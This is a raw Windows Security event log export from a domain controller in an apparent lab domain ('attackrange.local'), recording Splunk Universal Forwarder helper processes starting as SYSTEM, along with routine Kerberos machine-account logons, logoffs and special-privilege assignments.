Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265221
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:04:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265222
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D5AAE
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:04:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265225
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D875D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:04:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265224
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8D875D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65089
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:04:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265223
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8D875D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:05:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265226
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265228
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265227
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1084
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265229
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1820
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265231
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1138
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265230
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1920
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265232
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:05:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265235
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8DBFD3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 04:05:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265234
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8DBFD3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65102
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 04:05:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265233
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8DBFD3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 04:06:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265236
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:06:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265238
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:06:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265237
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1734
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 04:06:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265239
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.